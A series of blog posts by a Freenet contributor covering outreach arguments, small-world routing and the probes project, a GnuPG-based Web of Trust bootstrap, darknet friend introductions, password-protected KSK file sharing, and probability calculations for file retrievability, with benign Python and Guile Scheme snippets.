There's no need for Freenet, because nothing is wrong, otherwise my daily commute in my gas guzzler and my TV would be bad, and I like those!

You don’t have to change your life to use Freenet. You do harm yourself quite a bit if you let others control your communication, though. They might make you think your life is bad.

Get a life, you neckbeard.

Let’s play some games on Freenet. We need more fun and life here, that’s true.

Why are you being so distrustful and negative? What are you hiding?

Did you see what they did to Edward Snowden?

If I use it, then I'm helping terrorists blow us up!

If you let terrorists listen in on your communication, you help them scout out their targets!

It's slow!

Let’s not advertise sending movies. Chat over Freenet is nice (FLIP/FLIRCP).

I have to install two programs?

Need to recover flircp and enable it by default. Also advertise node-to-node textmessages (friend-to-friend talk).

Same for Sharesite and Darknet Chat.

I'm not good with computers!

Freenet is easier to install than Starcraft!

im confuse can i install without thinking loll??? I don't care enough to bother.

Yes you can. Most times it actually works.

My computer says it's a dangerous virus!

Need to get fred whitelisted in more anti-virus databases… the new C# based installer should help.

I'm not a hacker!

I don’t break into computers either. And I don’t want others to publish what I tell you in private.

Is there an app for my iPhone?

There is something for your Android: https://f-droid.org/repository/browse/?fdid=co.loubo.icicle

Can't you just send me the files on Skype?

Sure, but I won’t send anything I wouldn’t also send to the local newspaper. Microsoft has been shown to actually try out login links sent over Skype.

I don't have time for this I have to go to work.

Just try again a few weeks or months later.


Short term solutions (stuff which should take less than 6 months to deploy):

Website

  • put more prominently on front page that Freenet Project Inc. is a registered charity.
  • quote the guardian or so about the importance of secure communication.
  • quote a US president and the UN secretary on the importance of free speech for democracy.
  • quote Edward Snowden.
  • quote someone on the importance of secure communication to fight terrorists.
  • make the download page look easy. Maybe a big button instead of a text-link?
  • link the icicle app on the webpage. With an image.
  • promote the use of node-to-node messages in friend-to-friend mode.
  • ask people every few months to try to invite their friends again. Hey, how about sending another note to your friends today?

Using Freenet

  • get more positive, friendly content on Freenet.
  • play fun games over Freenet.

Freenet development

  • recover flircp. Make flircp and Darknet Chat official. Activated by default.
  • polish the user interface. A lot.

Wrapup

Go to https://freenetproject.org/pages/download.html and run the installer. Send your friends there, too. It’s fast and easy. And gives you a confidential communication channel.

Originally published on random_babcom: my in-Freenet single-page blog.


  1. The Freenet Project Inc is a 501(c)(3) non-profit organization, with the mission "to assist in developing and disseminating technological solutions to further the open and democratic distribution of information". It is registered under EIN 95-4864038. 

Background of Freenet Routing and the probes project (GSoC 2012)

The probes project is a Google Summer of Code project by Steve Dougherty intended to optimize the network structure of Freenet. Here I will briefly give the background of his project:

The Small World Structure

Freenet organizes nodes by giving them locations - like coordinates. Each node knows some others and can send data only to those to which it is connected directly. If your node wants to contact someone it does not know directly, it sends a message to one of the nodes it knows and asks that one to forward the message. Deciding whom to ask to forward the message is part of the routing.

And the routing algorithm in Freenet assumes a small world network: Your node knows many people who are close to you and a few who are far away. Imagine that as knowing many people in your home town and few in other towns. There is mathematical proof that the routing is very efficient and scales to billions of users - if it really operates on a small world network.

So each Freenet node tries to organize its connections in such a way that it is connected to many nodes close by and some far away.⁽¹⁾ The structure of the local connections of your own node can be characterized by the link length distribution: “How many short and how many long connections do you have?”
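
To make that concrete, here is a tiny sketch (illustrative only, not Freenet code; the function names are made up) which measures the circular distance between two locations and bins the connections of a node into short and long links:

# Illustrative sketch, not actual Freenet code: locations live on a
# circle [0, 1), so the distance wraps around at 1.0.
def circular_distance(a, b):
    d = abs(a - b)
    return min(d, 1.0 - d)

def link_length_distribution(my_location, peer_locations, threshold=0.1):
    """Count how many connections are short (< threshold) and how many are long."""
    short = sum(1 for p in peer_locations
                if circular_distance(my_location, p) < threshold)
    return short, len(peer_locations) - short

# A node at location 0.95 with a few peers: most are close, one is far away.
print(link_length_distribution(0.95, [0.93, 0.97, 0.02, 0.96, 0.5]))
# -> (4, 1): four short links, one long link - roughly what a small
#    world structure looks like locally.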

Probes and their Promise

Steve's probes project analyzes the structure of the network and the structure of the local connections of nodes in an anonymous way, in order to improve the self-organization algorithm in Freenet. The reason: if the structure of the network is not a small world network, the routing algorithm becomes much less efficient.

That in turn means that if you want to get some data from the network, that data has to travel over far more intermediate nodes, because Freenet cannot determine the shortest route. And if the data has to travel over more nodes, it consumes more bandwidth and takes longer to reach you. In the worst case it could happen that Freenet does not find the data at all.

To estimate the effect of that, you can look at the bar chart The Seeker linked to:

[bar chart (freenet-probes-size-degree-chart.png): mean number of hops per request for different network structures and sizes]

Low is an ideal structure with 16 connections per node, Conforming is the measured structure with about 17 connections per node (a cluster with 12, one with ~25). Ideally we would want Normal with 26 connections per node and an ideal structure. High is 86 connections. The simulated network sizes are 6000 nodes (Small), 18 000 (Normal, as measured), 36 000 (Large). Fewer hops is better.

It shows how many steps a request has to take to find some content. “Conforming” is the actually measured structure. “Low”, “Normal” and “High” show the number of connections per node in an optimal network: 16, 26 and 86. The actually measured mean number of connections in Freenet is similar to “Low”, so that’s the bar with which we need to compare the “Conforming” bar to see the effect of the suboptimal structure. And that effect is staggering: A request needs about twice as many steps in the real network as it would need in an optimally structured network.

Practically: If Freenet managed to get closer to the optimal structure, it could double its speed and cut the reaction times in half. Without changing anything else - and also without changing the local bandwidth consumption: You would simply get your content much faster.

If we managed to increase the mean number of connections to about 26 (that’s what a modern DSL connection can manage without too many ill effects), we could double the speed and halve the reaction times again (but that requires more bandwidth in the nodes which currently have a low number of connections: Many have only about 12 connections, many have about 25 or so, few have something in between).

Essentially that means we could gain a factor of 2 to 4 in speed and reaction times. And better scalability (compare the normal and the large network).


Note ⁽¹⁾: Network Optimization using Only Local Knowledge

To achieve a good local connection-structure, the node can use different strategies for Opennet and Darknet (this section is mostly guessed, take it with a grain of salt. I did not read the corresponding code).

In Opennet it can look whether it finds nodes which would improve its local structure. If it finds one, it can replace the local connection which distorts its local structure the most with the new connection.

In Darknet on the other hand, where it can only connect to the folks it already knows, it looks at the locations of nodes it hears about. It then checks whether its local connections would be better if it had that other node's location. In that case, it asks the other node whether it would agree to swap locations (without changing any real connections: It only changes the notion of where it lives. As if you swapped flats with someone else, but without changing who your friends are. Afterwards both of you live closer to your respective friends).

In short: In Opennet, Freenet changes to whom it is connected in order to achieve a small world structure: It selects its friends based on where it lives. In Darknet it swaps its location with strangers to live closer to its friends.
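
As a rough illustration of the swap idea (remember: this section is guessed, and so is the sketch below; the real algorithm is more involved and uses a randomized acceptance rule), two nodes could agree to swap whenever the swap brings their combined distance to their friends down:

# Illustrative sketch only: swapping locations without changing any connections.
def circular_distance(a, b):
    d = abs(a - b)
    return min(d, 1.0 - d)

def total_distance(location, friend_locations):
    return sum(circular_distance(location, f) for f in friend_locations)

def should_swap(loc_a, friends_a, loc_b, friends_b):
    """Swap if the combined distance of both nodes to their friends shrinks."""
    before = total_distance(loc_a, friends_a) + total_distance(loc_b, friends_b)
    after = total_distance(loc_b, friends_a) + total_distance(loc_a, friends_b)
    return after < before

# Node A at 0.1 whose friends sit around 0.8, node B at 0.8 with friends around 0.1:
print(should_swap(0.1, [0.78, 0.82], 0.8, [0.08, 0.12]))  # -> True: both profit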

Attachments:
freenet-probes-size-degree-chart.png (13.94 KB)

Bootstrapping the Freenet WoT with GnuPG - and GnuPG with Freenet

Intro

When you enter the freenet Web of Trust, you first need to get some trust from people by solving captchas. And even when people trust you somehow, you have no way to prove your identity in an automatic way, so you can’t create identities which freenet can label as trusted without manual intervention from your side.

Proposal

To change this, we can use the Web of Trust used in GnuPG to infer trust relationships between freenet WoT IDs.

Practically that means:

  • Write a message: “I am the WoT ID USK@” (replace with the public key of your WoT ID).
  • Sign that message with a GnuPG key you want to connect to the ID. The signature proves that you control the GnuPG key.
  • Upload the signed message to your WoT key: USK@/bootstrap/0/gnupg.asc. To make this upload, you need the private key of the ID, so the upload proves that you control the WoT ID.

Now other people can download the file from you, and when they trust the GnuPG key, they can transfer their trust to the freenet WoT-ID.
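
A minimal sketch of how that could look with the python-gnupg package and pyFreenet (the USK strings and the key ID are placeholders; the file path follows the proposal above):

# Sketch under the assumptions above: python-gnupg for signing,
# pyFreenet (fcp) for the insert. Keys and key ID are placeholders.
import gnupg
import fcp

wot_public = "USK@..."    # public key of your WoT ID (placeholder)
wot_private = "USK@..."   # private key of your WoT ID (placeholder)

gpg = gnupg.GPG()
# Clearsign the claim with the GnuPG key you want to connect to the ID
# (gpg-agent will ask for your passphrase).
signed = gpg.sign("I am the WoT ID " + wot_public, keyid="DEADBEEF")

n = fcp.node.FCPNode()
# Upload under the WoT ID: only the owner of the private key can do this.
n.put(uri=wot_private + "/bootstrap/0/gnupg.asc", data=str(signed))
n.shutdown()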

Automatic

Ideally all this should be mostly automatic:

  • click a link in the freenet interface and select the WoT ID to have freenet create the file and run your local GnuPG program.
  • Then select your GnuPG key in the GnuPG program and enter your password.
  • Finally check the information to be inserted and press a button to start the upload.

As soon as you have a GnuPG key connected with your WoT ID, freenet should scout all other WoT IDs for GnuPG keys and check whether the local GnuPG key you assigned to your WoT ID trusts the other key. If yes, give automatic trust (real person → likely no spammer).
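
A sketch of that check (placeholder key again; python-gnupg's verify() tells us whether the signature is good and how much our local keyring trusts the signing key):

# Sketch: fetch another identity's bootstrap file, verify the signature,
# and check how much our keyring trusts the signer.
import gnupg
import fcp

other_wot_public = "USK@..."  # the other identity's public WoT key (placeholder)

n = fcp.node.FCPNode()
mime, data, meta = n.get(other_wot_public + "/bootstrap/0/gnupg.asc")
n.shutdown()

gpg = gnupg.GPG()
verified = gpg.verify(data)
if verified and verified.trust_level is not None \
        and verified.trust_level >= verified.TRUST_FULLY:
    # A key we fully trust signed the claim: real person, likely no spammer.
    print("give automatic trust to " + other_wot_public)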

Anonymously

To make the connection one-way (bootstrap the WoT from GnuPG, but not expose the key), you might be able to encrypt the message to all people who signed your GnuPG key. Then these can recognize you, but others cannot.

This loses you the indirect trust from the GnuPG web of trust, though.


I hope this bootstrap-WoT draft sounded interesting :)

Happy hacking!

Building the darknet one ref at a time

Building the darknet one ref at a time. That’s what we have to do. If you invite three people⁰ to Freenet and help those of your friends with similar interests to connect¹ ², and the people you invited then do the same, we get exponential growth.

⁰: To invite a friend into Freenet, you can send an email like this:
    Let us talk over Freenet, so I can speak freely again.

¹: Helping your friends to connect works as follows:

  1. ask: First ask your friends whether they want to connect to others. Just go to the friends page ( http://127.0.0.1:8888/friends/ ), tick the checkbox next to each of the friends you want to ask and click the drop-down list at the bottom named -- Select action --. Select Send N2NTM to selected peers³ and click Go. A text field opens with which you can send a message to all the peers you selected. I typically ask something like "Hi, do you want to connect via darknet to fellow pirate party members?" (replace "pirate party members" by whatever unites the group of people you’re asking).
  2. noderefs: Go to the friends page in advanced mode ( http://127.0.0.1:8888/friends/?fproxyAdvancedMode=2 ). There you find a link named noderef next to each name. Just download the noderefs of the people who want to connect.
  3. introduction file: Then copy them into a text file and add a short description of each person before the person's noderef.
  4. upload: Now upload that text file. I use freenetupload from pyFreenet for that, but regular insert via the browser ( http://127.0.0.1:8888/insertfile/ ) works as well (a scripted alternative is sketched after this list). When the upload finishes, you’ll find the link on the uploads page ( http://127.0.0.1:8888/uploads/ - see the column key).
  5. message: Go to the friends page again (I’m lazy and use simple mode: http://127.0.0.1:8888/friends/?fproxyAdvancedMode=1 ), tick the checkbox next to each of the friends you want to help connect and click the drop-down list at the bottom named -- Select action --. Select Send N2NTM to selected peers and click Go. A text field opens with which you can send a message to all the peers you selected.
  6. write and send: Write something like "The following link includes the noderefs of people you might want to connect to. Just copy the noderef (from 'identity' to 'End') into the text field on http://127.0.0.1:8888/addfriend/ if you want to connect. If both of you do that, your freenet nodes will connect". Copy the link to the uploaded introduction text file into the text field (below your text) and click Send message.
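
If you prefer to script step 4, the upload could look like this with pyFreenet (a sketch; the filename is just an example, and n.put() returns the key you paste into the message in step 6):

# Sketch: insert the introduction text file (the collected noderefs with
# short descriptions) into Freenet and print the resulting key.
import fcp

with open("noderefs-for-my-friends.txt") as f:  # example filename
    text = f.read()

n = fcp.node.FCPNode()
key = n.put(data=text, mimetype="text/plain")
n.shutdown()
print(key)  # paste this key into the N2NTM you send in step 5 and 6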

²: Only connect those with similar interests (who might in the real world meet in a club or at work or who are related by blood or association). This is needed for efficient routing in Freenet.

When free speech dies, we need a place to organize. Let’s build that place.

³: A N2NTM is a Node-To-Node-Text-Message: A confidential message sent between people whose Freenet nodes are connected as friends.

Thanks for this text goes to ts.

De-Orchestrating Freenet with the QUEEN program

So Poul-Henning Kamp thought this was just a thought experiment …

At FOSDEM 2014, Poul-Henning Kamp talked about a hypothetical “Project ORCHESTRA” by the NSA with the goal of disrupting internet security: Information, Slides, Video (with some gems not in the slides).

One of the ideas he mentioned was the QUEEN program: Psy-Ops for Nerds.

I’ve been a contributor to the Freenet Project for several years. And in that time, I experienced quite a few of these hypothetical tactics first-hand.

This is the list of good matches: Disruptive actions which managed to keep Freenet from moving onwards, often for several months. It’s quite horrifying how many there are. Things which badly de-orchestrated Freenet:

  • Steer discussions to/from hot spots (“it can’t be that hard to exchange a text file!” ⇒ noderef exchange fails all the time, which is the core of darknet!)
  • Disrupt consensus building: Horribly long discussions which cause the resolution to be forgotten due to a fringe issue.
  • “Secrecy without authentication is pointless”.
  • “It gives a false sense of security” (if you tailor [these kinds of things] carefully, they speak to people's political leanings: If it’s not perfect: “No, that wouldn’t do it”. This stopped many implementations, till finally Bombe got too fed up and started the simple and working microblogging tool Sone)
  • “you shouldn’t do that! Do you really know what you are doing? Do you have a PhD in that? The more buttons you press, the more warnings you get” ← this is “filter failed”: No, I don’t understand this, “get me out of that!” ⇒ Freenet downloads fail when the filter failed.
  • Getting people to not do things by misdirecting their attention on it. Just check the Freenet Bugtracker for unresolved simple bugs with completely fleshed out solutions that weren’t realized.
  • FUD: I could be supporting bad content! (just like you do if your provider has a transparent proxy to reduce outgoing bandwidth - or with any VPN, Tor, i2p, .... Just today I read this: « you seriously think people will ever use freenet to post their family holiday photos, favourite recipes etc? … can you envisage ordinary people using freenet for stuff where they don't really have anything to hide? » — obvious answer: I do that, so naturally other people might do it, too.)
  • “Bikeshed” discussions: Sometimes just one single email from an anonymous person can derail a free software project for months!
  • Soak mental bandwidth with bogus crypto proposals: PSKs? (a new key-proposal which could make forums scale better but actually just soaked up half a year of the time of the main developer and wasn’t implemented - and in return, critical improvements for existing forums were delayed)
  • Witless volunteers (overlooking practical advantages due to paranoia, theoretical requirements which fail in the real world, overly pessimistic stance which scares away newcomers, voicing requirements for formal specification of protocols which are in flux).
  • Affect code direction (lots of the above - also ensuring that there is no direction, so it doesn’t really work well for anybody because it tries to have the perfect features for everybody before actually getting a reasonable user experience).
  • Code obfuscation (some of the stuff is pretty bad, lots of it looks like it was done in a hurry, because there was so much else to do).
  • Misleading documentation (or outdated or none…: There is plenty of Freenet 0.5 documentation while 0.7 is actually a very different beast)
  • Deceptive defaults (You have to set up your first pseudonym by hand, load two plugins manually and solve CAPTCHAs before you are able to talk to people anonymously, darknet does not work out of the box, the connection speed when given no unit is interpreted as Bytes/s - I’m sure someone once voiced a reason for that)

Phew, quite a list…

I provided this because naming the problems is an important step towards resolving them. I am sure that we can fix most of this, but it’s important to realize that while many of the points I named are most probably homegrown, it is quite plausible that some of them were influenced from the outside. Freenet was always a pretty high profile project in the crypto community, so it is an obvious target. We’d be pretty naive to think that we weren’t targeted.

And we have to keep this in mind when we communicate: We don’t only have to look out for bad code, but also for influences which make us take up toxic communication patterns which keep us from moving forward.

The most obvious fix is: Stay friendly, stick together, keep honest and greet every newcomer as a potential ally. And call out disrupting behaviour early on: If someone insults new folks or takes up huge amounts of discussion time by rehashing old discussions instead of talking about the way forward - in a way which actually leads to going forward - then say that this is your impression. Still stay friendly: Most of the time that’s not intentional. And people can be affected by outside influences like someone attacking them in other channels, so it would be important to help them recover and not to push them away because their behaviour became toxic for some time (as long as the time investment for that is not overarching).

Overall it’s about keeping the community together despite the knowledge that some of us might actually be aggressors or influenced from the outside to disrupt our work.

Distributed censorship-resistant Wikipedia

Thanks to doublec, there are now distributed censorship-resistant Wikipedia mirrors in Freenet: Distributed Wikipedia Mirrors in Freenet

The current largest mirror is the Simple English Wikipedia (the obvious choice to fight censorship worldwide: it is readable with basic English skills).

With this mirror, information from Wikipedia can be accessed in high-censorship countries:

freenet:USK@m79AuzYDr-PLZ9kVaRhrgza45joVCrQmU9Er7ikdeRI,1mtRcpsTNBiIHOtPRLiJKDb1Al4sJn4ulKcZC5qHrFQ,AQACAAE/simple-wikipedia/0/

To access the site, install Freenet from https://freenetproject.org (or get the installer from someone). If you run it on the default port, you can access the mirror anonymously via the following link:

Censorship-resistant Simple English Wikipedia

To test this without installing Freenet, see

https://freenet.cd.pn/USK@m79AuzYDr-PLZ9kVaRhrgza45joVCrQmU9Er7ikdeRI,1mtRcpsTNBiIHOtPRLiJKDb1Al4sJn4ulKcZC5qHrFQ,AQACAAE/simple-wikipedia/0/
(this one is not anonymous!)

Effortless password protected sharing of files via Freenet

TL;DR: Inserting a file into Freenet using the key KSK@<password> creates an invisible, password protected file which is available over Freenet.

Often you want to exchange some content only with people who know a given password and make it accessible to everyone in your little group but invisible to the outside world.

Until yesterday I thought that problem was slightly complex, because everyone in your group needs a given encryption program, and you need a way to share the file without exposing the fact that you are sharing it.

Then I learned two handy facts about Freenet:

  • Content is invisible to all but those with the key
    <ArneBab> evanbd: If I insert a tiny file without telling anyone the key, can they get the content in some way?
    <evanbd> ArneBab: No.

  • You generate a key from a password by using a KSK-key
    <toad_> dogon: KSK@<any string of text> -> generate an SSK private key from the hash of the text
    <toad_> dogon: if you know the string, you can both insert and retrieve it

In other words:

Just inserting a file into Freenet using the key KSK@<password> creates an invisible, password protected file which is shared over Freenet.

The file is readable and writeable by everyone who knows the password (within limits¹), but invisible to everyone else.

To upload a file as KSK, just go to the filesharing tab, click “upload a file”, switch to advanced mode and enter the KSK key.

Or simply click here (requires freenet to be running on your computer with default settings).
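
For the command-line inclined, the same thing works with pyFreenet (a sketch; the password and the text are just examples):

# Sketch: insert a file under KSK@<password> and fetch it back.
# Anyone who knows the password can derive the same key.
import fcp

password = "correct-horse-battery-staple"  # example password
n = fcp.node.FCPNode()
n.put(uri="KSK@" + password, data="Hello group!")
mime, data, meta = n.get("KSK@" + password)
n.shutdown()
print(data)

For the versioned variant from the footnote below, just append a counter to the password and insert the next number whenever you want to write again.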

It’s strange to think that I only learned this after more than 7 years of using Freenet. How many more nuggets might be hidden there, just waiting for someone to find them and document them in a style which normal users understand?

Freenet is a distributed datastore which can find and transfer data efficiently on restricted routes (search for meshnet scaling to see why that type of routing is really hard), and it uses a WebOfTrust for real-life spam-resistance without the need for a central authority (look at your mailbox to see how hard that is, even with big money).

How many more complex problems might it already have solved as byproduct of the search for censorship resistance?

So, what’s still to be said? Well, if Freenet sounds interesting: Join in!


  1. A KSK is writeable with the limit that you cannot replace the file while people still have it in their stores: You have to wait till it has been displaced, or be aware that two states for the file now exist: one with your new content and one with the old. Better just define a series of KSKs: Add a number to the KSK, and when you want to write, simply insert the next one. 

Exact Math to the rescue - with Guile Scheme

I needed to calculate the probability that for every freenet user there are at least 70 others within a distance of at most 0.01. That needs binomial coefficients with n and k on the order of 4000. My old Python script failed me with an OverflowError: integer division result too large for a float. So I turned to Guile Scheme and exact math.

1 The challenge

I need the probability that within 4000 random numbers between 0 and 1, at least 70 are below 0.02.

Then I need the probability that within 4000 random numbers, at most 5 find less than 70 others to which the distance is at most 0.02.

Or more exactly: I need to find the right maximum length to replace the 0.02.

2 The old script

I had a Python-script lying around which I once wrote for estimating the probability that a roleplaying group will have enough people to play in a given gaming night.

It’s called spielfaehig.py (german for “able to play”).

It just does this:

from math import factorial
fac = factorial

def nük(n, k):
   # binomial coefficient: n choose k
   if k > n: return 0
   return fac(n) / (fac(k)*fac(n-k))

def binom(p, n, k):
   # probability of exactly k successes in n tries, each with probability p
   return nük(n, k) * p**k * (1-p)**(n-k)

def spielfähig(p, n, min_spieler):
   # probability that at least min_spieler of the n succeed
   try: 
      return sum([binom(p, n, k) for k in range(min_spieler, n+1)])
   except ValueError: return 1.0

Now when I run this with p=0.02, n=4000 and min_spieler=70, it returns

OverflowError: integer division result too large for a float

The reason is simple: There are some intermediate numbers which are much larger than what a float can represent.

3 Solution with Guile

To fix this, I rewrote the script in Guile Scheme:

#!/usr/bin/env guile-2.0
!#

(define-module (spielfaehig)
  #:export (spielfähig))
(use-modules (srfi srfi-1)) ; for iota with count and start

(define (factorial n)
  (if (zero? n) 1 
      (* n (factorial (1- n)))))

(define (nük n k)
  (if (> k n) 0
      (/ (factorial n) 
         (factorial k) 
         (factorial (- n k)))))

(define (binom p n k)
  (* (nük n k) 
     (expt p k) 
     (expt (- 1 p) (- n k))))

(define (spielfähig p n min_spieler) 
  (apply + 
         (map (lambda (k) (binom p n k)) 
              (iota (1+ (- n min_spieler)) min_spieler))))

To use this with exact math, I just need to call it with p as exact number:

(use-modules (spielfaehig))
(spielfähig #e.03 4000 70)
;           ^ note the #e - this means to use an exact representation
;                           of the number

; To make Guile show a float instead of some huge division, just
; convert the number to an inexact representation before showing it.
(format #t "~A\n" (exact->inexact (spielfähig #e.03 4000 70)))

And that’s it. Automagic hassle-free exact math is at my fingertips.

It just works and uses less than 200 MiB of memory - even though the intermediate factorials return huge numbers. And huge means huge. It effortlessly handles numbers with a size on the order of 10⁸⁰⁰⁰. That is 10 to the power of 8000 - a number with 8000 digits.

4 The Answer

42! :)

The real answer is 0.0125: That’s the maximum length we need to choose for short links to get more than a 95% probability that in a network of 4000 nodes there are at most 5 nodes for which there are less than 70 peers with a distance of at most the maximum length.

If we can assume 5000 nodes, then 0.01 is enough. And since this is the number we directly got from an analysis of our link length distribution, it is the better choice, though it will mean that people with huge bandwidth cannot always max out their 100 connections.

5 Conclusion

Most of the time, floats are OK. But there are the times when you simply need exact math.

In these situations Guile Scheme is a lifesaver.

Dear GNU Hackers, thank you for this masterpiece!

And if you were crazy enough to read till here, Happy Hacking to you!

Attachments:
2014-07-21-Mo-exact-math-to-the-rescue-guile-scheme.org (4.41 KB)

Exploring the probability of successfully retrieving a file in freenet, given different redundancies and chunk lifetimes

In this text I want to explore the behaviour of the degrading yet redundant anonymous file storage in Freenet. It only applies to files which were not subsequently retrieved.

Every time you retrieve a file, it gets healed which effectively resets its timer as far as these calculations here are concerned. Due to this, popular files can and do live for years in freenet.

1 Static situation

First off, we can calculate the retrievability of a given file at different redundancy levels, given fixed chunk retrieval probabilities.

Files in Freenet are cut into segments which are again cut into up to 256 chunks each. With the current redundancy of 100%, only half the chunks of each segment have to be retrieved to get the whole file. I call that redundancy “2x”, because it inserts data 2x the size of the file (actually that’s just what I used in the code and I don’t want to force readers - or myself - to make mental jumps while switching from prose to code).
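
To get a feeling for the numbers, here is a small sketch using the spielfähig helper from the exact-math article above (the values are illustrative): a segment of 100 source chunks inserted with 2x redundancy consists of 200 chunks, of which any 100 suffice.

# Sketch: probability of retrieving one segment (100 of 200 chunks needed)
# for a few per-chunk retrieval probabilities, using spielfähig(p, n, k_min).
from spielfaehig import spielfähig

for p in (0.4, 0.5, 0.6):
    print(p, spielfähig(p, 200, 100))
# At p = 0.5 the segment survives only slightly more than half the time;
# a little above 0.5 it is almost always retrievable, a little below
# almost never - the transition is sharp.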

We know from the tests done by digger3 that after 31 days about 50% of the chunks are still retrievable, and after about twice that time only 30%. Let’s look at how that affects our retrieval probabilities.

# encoding: utf-8
from spielfaehig import spielfähig
from collections import defaultdict
data = []
res = []
for chunknumber in range(5, 105, 5):...
byred = defaultdict(list)
for num, prob, red, retrieval in data:...
csv = "; num prob retrieval"
for red in byred:...

# now plot the files

plotcmd = """
set term png
set width 15
set xlabel "chunk probability"
set ylabel "retrieval probability"
set output "freenet-prob-redundancy-2.png"
plot "2.csv" using 2:3 select ($1 == 5) title "5 chunks", "" using 2:3 select ($1 == 10) title "10 chunks", "" using 2:3 select ($1 == 30) title "30 chunks", "" using 2:3 select ($1 == 100) title "100 chunks"
set output "freenet-prob-redundancy-3.png"
plot "3.csv" using 2:3 select ($1 == 5) title "5 chunks", "" using 2:3 select ($1 == 10) title "10 chunks", "" using 2:3 select ($1 == 30) title "30 chunks", "" using 2:3 select ($1 == 100) title "100 chunks"
set output "freenet-prob-redundancy-4.png"
plot "4.csv" using 2:3 select ($1 == 5) title "5 chunks", "" using 2:3 select ($1 == 10) title "10 chunks", "" using 2:3 select ($1 == 30) title "30 chunks", "" using 2:3 select ($1 == 100) title "100 chunks"
"""
with open("plot.pyx", "w") as f:...

from subprocess import Popen
Popen(["pyxplot", "plot.pyx"])

So what does this tell us?

./freenet-prob-redundancy-2.png

Retrieval probability of a given file in a static case. redundancy 100% (2)

redundancy 200% (3)

Retrieval probability of a given file in a static case. redundancy 200% (3)

redundancy 300% (4)

Retrieval probability of a given file in a static case. redundancy 300% (4)

This looks quite good. After all, we can push the lifetime as high as we want by just increasing redundancy.

Sadly it is also utterly wrong :) Let’s try to get closer to the real situation.

2 Dynamic Situation: The redundancy affects the replacement rate of chunks

To find a better approximation of the effects of increasing the redundancy, we have to stop looking at freenet as a fixed store and have to start seeing it as a process. More exactly: We have to look at the replacement rate.

2.1 Math

A look at the stats from digger3 shows us that after 4 weeks 50% of the chunks are gone. Let’s call this the dropout rate. The dropout rate consists of churn and chunk replacement:

dropout = churn + replacement

Since after one day the dropout rate is about 10%, I’ll assume that the churn is lower than 10%. So for the following parts, I’ll just ignore the churn (naturally this is wrong, but since the churn is not affected by redundancy, I just take it as constant factor. It should reduce the negative impacts of increasing redundancy). So we will only look at replacement of blocks.

Replacement consists of new inserts and healing of old files.

replacement = insert + healing

If we increase the redundancy from 2 to 3, the insert and healing rate should both increase by 50%, so the replacement rate should increase by 50%, too. The healing rate might increase a bit more, because healing can now restore 66% of the file as long as at least 33% are available. I’ll ignore that, too, for the time being (which is wrong again. We will need to keep this in mind when we look at the result).

redundancy 2 → 3 ⇒ replacement rate × 1.5

Increasing the replacement rate by 50% should decrease the lifetime of chunks by 1/1.5, or:

chunk lifetime × 2/3

So we will reach the 50% limit not after 4 weeks, but after about 19 days. But on the other hand, redundancy 3 only needs 33% chunk probability, which has 2× the lifetime of 50% chunk probability. So the file lifetime should change by 2 × 2/3 = 4/3:

file lifetime × 4/3 = file lifetime +33%

Now doesn’t that look good?

As you can imagine, this pretty picture hides a clear drawback: The total storage capacity of Freenet gets reduced by 33%, too, because now every file requires 1.5× as much space as before.

2.2 Caveats (whoever invented that name? :) )

We ignored churn, so the chunk lifetime reduction should be a bit less than the estimated 33%. That’s good and life is beautiful, right? :)

NO. We also ignored the increase in the healing rate. This should be higher, because every retrieved file can now insert more of itself in the healing process. If we had no new inserts, I would go as far as saying that the healing rate might actually double with the increased redundancy. So in a completely filled network without new data, the effects of the higher redundancy and the higher replacement rate would exactly cancel. But the higher redundancy would be able to store fewer files. Since we are constantly pushing new data into the network (for example via discussions in Sone), this should not be the case.

2.3 Dead space

Aside from hiding some bad effects, this simple model also hides a nice effect: A decreased amount of dead space.

First off, let's define it:

2.4 What is dead space?

Dead space is the part of the storage space which cannot be used for retrieving files. With any redundancy, that dead space is just about the size of the original file without redundancy multiplier. So for redundancy 2, the storage space occupied by the file is dead, when less than 50% are available. With redundancy 3, it is dead when less than 33% are available.

2.5 Effect

That dead space is replaced like any other space, but it is never healed. So the higher replacement rate means that dead space is recovered more quickly. So, while a network with higher redundancy can store fewer files overall, those files which can no longer be retrieved take up less space. I won’t add the math for that here, though (because I did not do that yet).

2.6 Closing

So, as closing remark, we can say that increasing the redundancy will likely increase the lifetime of files. It will also reduce the overall storage space in Freenet, though. I think it would be worthwhile.

It might also be possible to give probability estimates in the GUI which show how likely it is that we can retrieve a given file after a few percent were downloaded: If more than 1/redundancy of the chunks succeed, the probability to get the file is high. If close to 1/redundancy succeed, the file will be slow, because we might have to wait for nodes which went offline and will come back at some point. Essentially we will have to hope for churn. If much less than 1/redundancy of the chunks succeed, we can stop trying to get the file.

Just use the code in here for that :)
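
A rough sketch of such an estimate (the numbers and thresholds are made up; it reuses spielfähig from above): estimate the per-chunk probability from the chunks tried so far and feed that into the segment calculation.

# Sketch: after trying some chunks of a segment, estimate the per-chunk
# success probability and the chance of completing the whole segment.
from spielfaehig import spielfähig

def completion_estimate(succeeded, tried, total_chunks, needed_chunks):
    p = succeeded / float(tried)  # crude estimate of per-chunk availability
    return spielfähig(p, total_chunks, needed_chunks)

# 2x redundancy, 200 chunks total, 100 needed; 12 of 20 tried chunks succeeded:
print(completion_estimate(12, 20, 200, 100))  # well above 1/redundancy -> promising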

3 Background and deeper look

Why redundancy at all? Redundancy 1: one chunk fails ⇒ the file fails. Redundancy 2: 50% of the chunks suffice. Redundancy 3: 33% suffice.

3.1 No redundancy

Let’s start with redundancy 1. If one chunk fails, the whole file fails.

Compared to Freenet today, the replacement rate would be halved, because each file takes up only half the current space. So the 50% dead-chunks rate would be reached after 8 weeks instead of after 4 weeks. And the 90% mark would be reached after 2 days instead of after 1 day. We can guess that the 99% mark would be reached after a few hours.

Let’s take a file with 100 chunks as example. That’s 100× 32 kiB, or about 3 Megabyte. After a few hours the chance will be very high that it will have lost one chunk and will be irretrievable. Freenet will still have 99% of the chunks, but they will be wasted space, because the file cannot be recovered anymore. The average lifetime of a file will just be a few hours.

With 99% probability of retrieving a chunk, the probability of retrieving a file will be only about 37%.

from spielfaehig import spielfähig
return spielfähig(0.99, 100, 100)
→ 0.366032341273

To achieve 90% retrievability of the file, we need a chunk availability of 99.9%! The file is essentially dead directly after the insert finishes.

from spielfaehig import spielfähig
return spielfähig(0.999, 100, 100)
→ 0.904792147114

3.2 1% redundancy

Now, let's add one redundant chunk. Almost nothing will have changed for inserting and replacing, but now the probability of retrieving the file when the chunks have 99% availability is 73%!

from spielfaehig import spielfähig
return spielfähig(0.99, 101, 100)
→ 0.732064682546

The replacement rate is increased by 1%, as is the storage space.

